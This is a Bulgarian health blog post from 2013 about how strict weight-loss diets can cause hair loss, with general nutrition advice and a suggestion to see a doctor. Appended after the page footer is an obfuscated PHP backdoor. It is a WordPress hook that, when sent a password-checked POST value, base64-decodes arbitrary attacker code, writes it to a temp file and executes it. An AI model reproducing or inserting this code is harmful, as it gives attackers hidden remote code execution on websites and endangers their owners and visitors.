Може ли диета да предизвика косопад? | Косопад

Може ли диета да предизвика косопад?

Със сигурност вече знаете, че недохранването и липсата на основни хранителни вещества предизвикват косопад. Поради това вярвам, че няма да се изненадате като разберете, че определени диети за отслабване също биха могли да доведат до проблеми с косата.

косопад диети

Косопад и хранене

Когато тялото бъде подложено на лишения за продължителен (понякога и за сравнително кратък) период от време, нормално е да се появят някои характерни симптоми. По – леките от тях са раздразнителност, постоянно чувство за умора и сънливост, нежелание за работа. Тежките включват косопад, силно главоболие, депресия, дори панически страх от настоящето и бъдещето.

Ако изпаднете в състояние като това, незабавно променете вашата диета. Осигурете си питателна и силна храна, задължително купете суплементи за подсилване на организма. На този етап забравете за отслабване, защото сега най – важно е да оцелеете.

Как да отстраните косопад след тежка диета?

Както казахме в горния параграф – чрез корекция в хранителния режим. Напълнете хладилника с богати на протеин храни (космите са изградени на 75% от белтък) като месо, яйца, риби, биологично мляко. Супер полезни са и билковите чайове, а силно препоръчително е да пиете отвара от шипки, коприва и кантарион. Не забравяйте за зеленчуците и плодовете, които са основни източници на витамини.

Не на последно място, отидете на лекар. Тежките и продължителни диети понякога правят доста по – сериозни поражения от косопад. Обяснете на медика какво сте направили и какво се е случило, за да е в състояние да ви даде най – правилния съвет.

Веднъж завинаги се откажете от бързите диети за отслабване. Съществуват десетки много по – успешни, умерени и здравословни начини да го направите, които никога няма да ви изложат на риск. Можете да ускорите възстановяването на косата освен чрез хранене и с помощта на домашните рецепти против косопад, които ще намерите тук.

24. ноември 2013 13:33:37 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}